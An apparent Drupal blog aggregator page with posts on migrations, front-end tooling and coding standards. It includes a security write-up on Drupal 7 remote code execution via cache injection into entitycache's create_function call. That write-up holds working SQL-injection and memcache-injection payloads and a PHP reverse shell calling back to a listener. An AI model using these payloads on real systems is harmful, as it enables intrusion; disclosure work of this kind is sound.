Promet Source: How to Keep Data Secure During CMS Migration

Takeaway: Securing data is a continuous process, not just a one-time action. When we talk about CMS migration, especially for sites with sensitive information, the focus should be as much on keeping data safe during the move as on ensuring its ongoing security afterward. As someone deeply involved in CMS migrations, my experience has shown that the real challenge lies not just in moving data, but in maintaining its integrity every step of the way.

Salsa Digital: Salsa at DrupalCon Europe 2023

Suchi’s Rules as Code presentation: Suchi’s presentation covers two Rules as Code implementations, both using OpenFisca and Drupal, including an OpenFisca Drupal module that integrates OpenFisca with a Drupal webform. Akhil’s CivicTheme presentation: Akhil’s presentation looks at the benefits of a design system and takes the audience through a Figma-to-Drupal mapping process with CivicTheme.

Drupal Core News: Coding standards proposals for final discussion on 20 December

The Technical Working Group (TWG) is announcing two coding standards changes for final discussion. Feedback will be reviewed at the meeting scheduled for Wednesday 20 December at 22:00 UTC.

Issues for discussion

The Coding Standards project page outlines the process for changing Drupal coding standards.

Join the team working on Coding Standards

Join #coding-standards in Drupal Slack to meet and work with others on improving the Drupal coding standards. We work on improving our standards as well as implementing them in the core software.

LN Webworks: Google Tag Manager With Drupal: All You Need to Know


Maximizing website engagement and interactivity is a major goal for all marketers. However, managing a multitude of third-party integrations and tracking tools is a laborious task. Thankfully, Google created Google Tag Manager to simplify the complicated lives of marketing teams worldwide. It makes managing, updating, and tracking tags, snippets, and third-party integrations a piece of cake.

The best part is that this platform is intuitive and user-friendly, which contributes a fair share to its massive appeal. If you own a Drupal website and, like many others, wonder how to use Google Tag Manager with Drupal, this blog is all you need. It explains everything in a detailed yet simplified manner.

First, let’s delve into what Google Tag Manager is and what makes it special.

Specbee: Handling Custom Drupal Migrations Using SqlBase

There’s so much going on in the world of Drupal migrations. Drupal 9 reached its End of Life (EOL) on November 1, 2023. Drupal 7 will reach EOL by January 2025 (its final extension). Drupal 10 was released back in December 2022, and its current version, 10.1.6, was released on November 1, 2023. More than twelve thousand sites have already migrated to the current version of Drupal 10 (according to the Upgrade Status module download stats). In this article, we’ll take you through the different Drupal migration methods, with a particular focus on custom migrations using the SqlBase source plugin. Take a look!

In Technical Terms, What is a Drupal Migration?

Drupal migration is the process of moving content, data, and configuration from another CMS (or an older version of Drupal) to Drupal. A migration consists of several steps: Extract, Transform, and Load (ETL). In the Drupal world, we refer to these as source plugins, process plugins, and destination plugins: Extract is the source, Transform is the process, and Load is the destination.

Drupal Migration Methods

When migrating your website from Drupal 7 to Drupal 9 or a later version, there are primarily two migration methods available:

  • Migration UI
  • Drush (custom migration)

Migration UI

When you want to migrate your entire web application, including all configurations and content, to a later version, you can use the Migration UI. It's a straightforward option that doesn't require in-depth knowledge of Drupal APIs. This approach works when your site architecture is not too complex and all the modules used in Drupal 7 are also available in the target version (Drupal 9 or Drupal 10).

Custom Migration

When you are rewriting your website with a more modern and performance-centric approach that significantly changes the architecture of your new site from Drupal 9 onwards, the Migration UI simply won't work.
In such cases, you’ll need to roll up your sleeves and build custom migration scripts.

Migration Process

Let’s dig deeper into the migration process. It comprises three major phases:

  • Source plugin (Extract)
  • Process plugin (Transform)
  • Destination plugin (Load)

Source Plugin

Source plugins handle the extraction of data from various sources, which can be in different formats, including raw data, databases, and CSV/XML/JSON files. They extract data from these sources and pass it on to the next phase of the migration process.

Process Plugin

The process plugin works on the source data, restructuring it to match the destination's requirements. It transforms the data into an array, where each key corresponds to a destination property. The values assigned to each key determine how the destination values for your new website are generated. More details can be found here.

Destination Plugin

The destination plugin processes the structured data and saves it to your website. The most common destination plugins are node, term, user, and media.

You likely have a grasp of the migration process now. Let's delve deeper into source plugins, with a specific focus on the SqlBase source plugin.

Thinking of migrating your Drupal 7 website to Drupal 10? Get your Drupal 7 Site Audit report for free!

Using SqlBase for the Drupal Migration

What is SqlBase migration?

SqlBase migration is straightforward: it gives you the flexibility to write custom SQL queries to obtain the desired output. Other than that, it follows the same principles as other Drupal migration methods.

Why should you use SqlBase migration?

When your site has a straightforward field structure, content types, etc., Drupal core migration can handle it. However, challenges arise with field types that are obsolete in Drupal 9, or when restructuring an old website with many content types. If you aim for an editor-friendly and performance-oriented site, a simple migration won't suffice.
You'll need to prepare your source data and take the SqlBase migration route. In another scenario, if your current site, built on a platform other than Drupal, provides its data in the form of a database, SqlBase migration is also the way to go.

Benefits of leveraging SqlBase migration

Since this is SqlBase, the speed of your migration relies entirely on how well you craft your database queries: the better your query preparation, the faster the migration will run. It doesn't rely on many core migration processes; you have the flexibility to shape and process your data as you see fit.

A SqlBase source plugin must implement these three methods:

  • query(): Returns the SQL query that selects the data from the source database.
  • fields(): Returns the available fields on the source.
  • getIds(): Defines the source fields that uniquely identify a source row.

Let’s get into the details of what these functions should contain:

query() function

  /**
   * {@inheritdoc}
   */
  public function query() {
    $query = $this->select('job_details', 'c')
      ->fields('c', array(
        'id',
        'title',
        'description',
        'position',
        'company',
        'criteria',
      ));
    return $query;
  }

fields() function

  /**
   * {@inheritdoc}
   */
  public function fields() {
    $fields = array(
      'id' => $this->t('Autoincrement ID'),
      'title' => $this->t('Job Title'),
      'description' => $this->t('Job Description'),
      'position' => $this->t('Job Position'),
      'company' => $this->t('Company'),
      'criteria' => $this->t('Job Criteria'),
    );
    return $fields;
  }

getIds() function

  /**
   * {@inheritdoc}
   */
  public function getIds() {
    return [
      'id' => [
        'type' => 'integer',
        'alias' => 'j',
      ],
    ];
  }

Additionally, you can tweak your SQL result by using the prepareRow() function and even add new source properties to your migration.
  /**
   * {@inheritdoc}
   */
  public function prepareRow(Row $row) {
    $company = $row->getSourceProperty('company');
    $row->setSourceProperty('job_type', 'on-site');
    if ($company == 'specbee') {
      $row->setSourceProperty('job_type', 'remote');
    }
    return parent::prepareRow($row);
  }

These source properties will be sent to your migration YML files, and you can also use your own processor if you want any additional processing of your source data.

References

https://www.drupal.org/project/usage/3398311

Final Thoughts

With Drupal 9's EOL, the impending farewell to Drupal 7, and the rise of Drupal 10, the need for seamless transitions has never been more pressing. As Drupal evolves, our Drupal Development Company recognizes SqlBase as an essential tool for a smooth and efficient migration process. Offering the flexibility to shape custom SQL queries, it plays a vital role in crafting tailored data transitions. If you’re looking for a reliable Drupal migration partner, we’re just a form away!
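To show where these pieces plug in end-to-end, here is a hedged sketch of the migration YAML definition that would reference a custom SqlBase source plugin like the one above. The plugin ID, database connection key, and destination field names are all assumptions for illustration, not taken from the article:

```yaml
id: job_details
label: 'Job details migration'
source:
  # Annotation ID of the custom SqlBase source plugin (assumed).
  plugin: job_details
  # Database connection key defined in settings.php (assumed).
  key: migrate
process:
  title: title
  body/value: description
  field_position: position
  field_company: company
  # Source property added in prepareRow().
  field_job_type: job_type
destination:
  plugin: 'entity:node'
  default_bundle: job
```

With a definition like this in place, the migration would typically be run with Drush (e.g. via the Migrate Tools commands).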

mcdruid.co.uk: Remote Code Execution in Drupal via cache injection, drush, entitycache, and create_function

PHP's create_function() was:

DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0

As the docs say, its use is highly discouraged.

PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular Linux distributions provide support for years beyond the upstream End of Life).

Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.

The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.

The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.

This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.

To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.

Is it unsafe input?

Interestingly, the issue is in a drush-specific .inc file:

/**
 * Implements hook_drush_cache_clear().
 */
function entitycache_drush_cache_clear(&$types) {
  $entities = entity_get_info();
  foreach ($entities as $type => $info) {
    if (isset($info['entity cache']) && $info['entity cache']) {
      // You can't pass paramters to the callbacks in $types, so create an
      // anonymous function for each specific bin.
      $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);");
      $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba;
    }
  }
}

https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...

Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.

So - as is often the case - it's very risky to pass unsafe user input to it.

In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().

Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?
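Before looking at how, it's worth seeing why those array keys matter. Here's a hedged shell sketch (not the real exploit, just string construction) of what ends up in the code string that create_function() evaluates, much like eval(), when $type is attacker-controlled:

```shell
# A benign $type just becomes part of the function body:
type="node"
echo "return cache_clear_all('*', 'cache_entity_${type}', TRUE);"
# prints: return cache_clear_all('*', 'cache_entity_node', TRUE);

# A crafted array key closes the statement and smuggles in extra PHP:
type="foo', TRUE);} echo \"code execution successful\"; //"
echo "return cache_clear_all('*', 'cache_entity_${type}', TRUE);"
```

The second string terminates the intended call, appends attacker PHP, and comments out the trailing syntax, which is exactly the shape of payload used later in this post.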

entity_get_info() uses a cache to minimise calls to implementations of hook_entity_info.

If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.

Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.

How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:

Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.

So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.

We'll also look at how an attacker might use memcache as an attack vector.

Proof of Concept

To keep things simple initially, we'll look at conducting the attack via SQL.

Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.

As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.

Objectives

  • The malicious payload has to be injected into the array keys of the cached data returned by entity_get_info().
  • The injection cannot break Drupal so badly that drush cannot run a cache clear.
  • However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).

We can see that the relevant cache item here is:

$cache = cache_get("entity_info:$langcode")

The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:

array('malicious payload' => 'foo');

Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_cache_info() will return.

The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.

We can use drush to run some simple code that stores our array into the cache:

$ drush php

>>> $entity_info = array('malicious payload' => 'foo');
=> [
     "malicious payload" => "foo",
   ]

>>> cache_set('entity_info:en', $entity_info);

Now let's look at the cache item in the db:

$ drush sqlc

> SELECT * FROM cache WHERE cid = 'entity_info:en';
+----------------+-------------------------------------------+--------+------------+------------+
| cid            | data                                      | expire | created    | serialized |
+----------------+-------------------------------------------+--------+------------+------------+
| entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} | 0      | 1696593295 | 1          |
+----------------+-------------------------------------------+--------+------------+------------+

Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)
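As a side note for anyone hand-crafting payloads later: the s:N: tokens in PHP's serialize() output are byte counts. The cached row a:1:{s:17:"malicious payload";s:3:"foo";} declares 17 bytes for the array key and 3 for the value, which is easy to sanity-check:

```shell
# Byte counts must match the s:N: prefixes in the serialized data.
printf '%s' "malicious payload" | wc -c   # 17
printf '%s' "foo" | wc -c                 # 3
```

Keeping these counts in sync matters as soon as we start editing serialized blobs by hand.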

How is the site doing now? Let's try a drush status:

$ drush st

Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc).
Drush was not able to start (bootstrap) Drupal. Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.

That's not so great, and importantly we get the same error when we try to clear caches by running drush cc all.

We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.

The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.

It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.

We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb) and is therefore quite cumbersome to manipulate.

Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.

It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.

Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:

$entity_info['user'] = [
  'controller class' => 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];

$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user'],
];

Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.

Let's try injecting that into the cache via drush php and then checking whether drush is still functional.

It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.

$ cat cache_injection.php
<?php

$entity_info['user'] = [
  'controller class' => 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];

$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user'],
];

cache_set('entity_info:en', $entity_info);

$ drush scr cache_injection.php

$ drush st
Drupal version : 7.99-dev
...snip - no errors...

$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => malicious payload
)

We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.

$ drush cc all
'all' cache was cleared.

$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => comment
    [1] => node
    [2] => file
    [3] => taxonomy_term
    [4] => taxonomy_vocabulary
    [5] => user
)

We're making progress though.

Let's try putting an actual payload into the array key in our script:

$ tail -n7 cache_injection.php

$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user'],
];

cache_set('entity_info:en', $entity_info);

$ drush scr cache_injection.php

$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);} echo "code execution successful"; //
)

$ drush cc all
code execution successfulcode execution successful'all' cache was cleared.

Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.

A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.

Having said that we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do that, they wouldn't really need to mess around with injecting payloads into the caches.

Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.

Attack via SQLi

If we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.

$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";'
a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}

This is not very pretty to look at, but we can see our array has been serialized.

If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.

To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.

After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.

Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.

I often think fiddly things like this are the hardest part of developing these PoC exploits!

# inject the payload using a drush script
$ drush scr cache_injection.php

# extract the payload into a SQL statement stored in a file
$ echo -n "UPDATE cache SET data = '" > sqli.txt
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt
$ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt

# empty the cache table, and repopulate it with valid entries
$ drush sqlq 'DELETE FROM cache;'
$ drush st

# inject the payload, simulating SQLi
$ cat sqli.txt | drush sqlc

# execute the attack
$ drush cc all
code execution successful
...

So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.

In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.

However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.

Attack via memcache

How about if the caches are in memcache; what might an attack look like then?

First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.

The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.

The mechanics of how we might do so are a little different with a "memcache injection" though.

The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).

In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.

Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:

$ echo "stats slabs" | nc memcached 11211 | head -n2
STAT 2:chunk_size 120
STAT 2:chunks_per_page 8738

$ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2
ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s]
ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]

This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.

So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.
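The key layout can be reconstructed mechanically; a hedged sketch assuming the prefix-bin-cid structure and percent-encoding seen in the cachedump output above:

```shell
# Rebuild the memcache key as <prefix>-<bin>-<cid>, with ':' encoded as %3A.
prefix="dd_d7"; bin="cache"; cid="entity_info:en"
printf '%s-%s-%s\n' "$prefix" "$bin" "$cid" | sed 's/:/%3A/g'
# prints: dd_d7-cache-entity_info%3Aen
```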

We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.

There are a couple of small complications we're likely to encounter with this workflow.

One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.

If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.

We can get around this by disabling compression on our test site.

Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).

This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp intact, it's possible that the item will already have expired by the time the payload is injected into the target site, and the attack will not work.

It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.
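For instance, a far-future Unix timestamp comfortably clears both checks; a quick sanity check (using GNU date) of 9999999999, the value substituted into the PoC later in this post:

```shell
# 9999999999 seconds after the epoch is well into the 23rd century,
# so neither memcached nor Drupal's cache API will treat it as expired.
date -u -d @9999999999 +%Y-%m-%d
```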

There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.

Injecting an item into memcache will typically mean using the SET command.

The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).

Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.

We also need to ensure that the PHP serialized data remains consistent; for example, if we change an IP address we need to ensure that the string it sits within still has the correct declared length, e.g. s:80:\"foo' ...
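A quick way to keep that honest is to recount the payload bytes whenever it is edited; here the reverse-shell array key really is the 80 bytes its s:80 prefix declares:

```shell
# If this count drifts from the s:N: prefix, unserialization fails.
payload='foo'\'', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);//'
printf '%s' "$payload" | wc -c   # 80
```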

Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:

$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211

This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().

$ ./poison_entity_info.sh # this script contains the memcache set command above
STORED

$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);//
)

$ drush cc all
'all' cache was cleared.

Meanwhile in the attacker's terminal...

$ nc -nvlp 1337
Listening on 0.0.0.0 1337
Connection received on 172.19.0.3 58220

python -c 'import pty; pty.spawn("/bin/bash")'

mcdruid@drupal-7:/var/www/html$ head -n2 CHANGELOG.txt
Drupal 7.xx, xxxx-xx-xx (development version)
-----------------------

We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.

One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.

Perhaps the injection into the entity_info cache item already achieves that goal?

Could this attack also be carried out via Redis? Probably.

I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.

As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().

Thanks to Greg Knaddison (greggles) for reviewing this post.

Tags: drupal-planet, security, rce, php, drush

PreviousNext: Drupal front-end nirvana with Vite, Twig and Storybook

We're proud to announce the release of vite-plugin-twig-drupal, a plugin for Vite that we hope will improve your workflow for front-end development with Drupal.

by lee.rowlands / 28 November 2023

The problem space

You're working with Twig in a styleguide-driven development process, writing isolated components that consist of CSS, Twig and JavaScript. In that workflow:

  • You want to be able to use Twig to render your components for Storybook.
  • You want fast refresh with Vite.
  • You want Twig embeds, includes and extends to work.
  • You want to use Drupal-specific Twig features like create_attribute etc.
  • You want compilation of PostCSS and SASS to CSS.
  • You want Hot Module Reloading (HMR) so that you can see how your components look without needing to endlessly refresh.

Enter vite-plugin-twig-drupal

vite-plugin-twig-drupal is a Vite plugin, based on Twig JS, that compiles Twig-based components into JavaScript functions so that they can be used as components with Storybook. It allows you to import Twig files into your story as though they were JavaScript files.

Comparison to other solutions

  • Vite plugin twig loader doesn't handle nested includes/embeds/extends. These are a fairly crucial feature of Twig when building a component library, as they allow re-use and DRY principles.
  • Components library server requires you to have a running Drupal site. Whilst this ensures your Twig output is identical to that of Drupal (because Drupal is doing the rendering), it is a bit more involved to set up. If you're going to use single directory components or a similar Drupal module like UI patterns, then this may be a better option for you.

Installation

The plugin is distributed via npm (which is bundled with Node.js) and should be installed as one of your project's devDependencies:

npm install --save-dev vite-plugin-twig-drupal

You then need to configure your vite.config.js.

import { defineConfig } from "vite"
import twig from 'vite-plugin-twig-drupal';
import { join } from "node:path"

export default defineConfig({
  plugins: [
    // Other vite plugins.
    twig({
      namespaces: {
        components: join(__dirname, "/path/to/your/components"),
        // Other namespaces as required.
      },
      // Optional if you are using the React storybook renderer. The default is
      // 'html' and works with storybook's html renderer.
      // framework: 'react'
    }),
    // Other vite plugins.
  ],
})

With this config in place, you should be able to import Twig files into your story files.

Examples

To make use of a Twig file as a Storybook component, just import it. The result is a component you can pass to Storybook or use as a function for more complex stories.

// stories/Button.stories.js
// Button will be a JavaScript function that accepts variables for the twig template.
import Button from './button.twig';
// Import stylesheets; this could be a sass or postcss file too.
import './path/to/button.css';
// You may also have JavaScript for the component.
import './path/to/some/javascript/button.js';

export default {
  title: 'Components/Button',
  tags: ['autodocs'],
  argTypes: {
    title: {
      control: { type: 'text' },
    },
    modifier: {
      control: { type: 'select' },
      options: ['primary', 'secondary', 'tertiary'],
    },
  },
  // Just pass along the imported variable.
  component: Button,
};

// Set default variables in the story.
export const Default = {
  args: { title: 'Click me' },
};

export const Primary = {
  args: { title: 'Click me', modifier: 'primary' },
};

// Advanced example.
export const ButtonStrip = {
  name: 'Button group',
  render: () => `
    ${Button({ title: 'Button 1', modifier: 'primary' })}
    ${Button({ title: 'Button 2', modifier: 'secondary' })}
  `,
};
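For reference, the story above assumes a template along these lines. This is a hypothetical sketch of button.twig — the markup and class names are assumptions; only the title and modifier variables come from the story's args:

```twig
{# button.twig — hypothetical template matching the story above. #}
<button class="button{{ modifier ? ' button--' ~ modifier : '' }}">
  {{ title }}
</button>
```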

Here's how that might look in Storybook (example from the Admin UI Initiative storybook).


Dealing with Drupal.behaviors

In cases where the JavaScript you import into your story file uses a Drupal behavior, you'll likely need some additional code in your Storybook configuration to fire the behaviors. Here at PreviousNext, we prefer to use a loadOnReady wrapper, which works with and without Drupal. However, if you're just using Drupal.behaviors, something like this in your Storybook config in main.js (or main.ts) will handle firing the behaviors:

const config = {
  // ... existing config
  previewBody: (body) => `
    <script>
      window.Drupal = window.Drupal || { behaviors: {} };
      window.drupalSettings = Object.assign(window.drupalSettings || {}, {
        // Mock any drupalSettings your behaviors need here.
      });
      // Mock Drupal's once library too.
      window.once = (_, selector) => document.querySelectorAll(selector);
      document.addEventListener('DOMContentLoaded', () => {
        Object.entries(window.Drupal.behaviors).forEach(([key, object]) =>
          object.attach(document),
        );
      });
    </script>
    ${body}
  `,
  // ... more config
}
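For the wrapper approach mentioned above, here is a hypothetical sketch of a loadOnReady-style helper — the actual PreviousNext implementation isn't shown in the post, so the name and details here are assumptions. The idea is to run component setup as a Drupal behavior when Drupal is present, and on DOM-ready otherwise, so the same file works in both Drupal and a plain Storybook preview:

```javascript
// Hypothetical loadOnReady wrapper (a sketch, not the actual PreviousNext helper).
function loadOnReady(callback) {
  const drupal = globalThis.Drupal;
  if (drupal && drupal.behaviors) {
    // Inside Drupal: register as a behavior so the callback also re-runs
    // (with the updated context) after AJAX-driven DOM changes.
    const name = `loadOnReady${Object.keys(drupal.behaviors).length}`;
    drupal.behaviors[name] = { attach: (context) => callback(context) };
  } else if (typeof document !== 'undefined' && document.readyState !== 'loading') {
    // Outside Drupal with the DOM already parsed: run immediately.
    callback(document);
  } else if (typeof document !== 'undefined') {
    // Outside Drupal with the DOM still loading: wait for DOMContentLoaded.
    document.addEventListener('DOMContentLoaded', () => callback(document));
  }
}
```

A component file would then call loadOnReady((context) => { /* initialise against context */ }) instead of registering a behavior directly, and no Storybook-side mocking of Drupal is needed.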

Give it a try

We're looking forward to using this plugin in client projects and are excited about the other possibilities Storybook provides us with, such as interaction and accessibility testing.

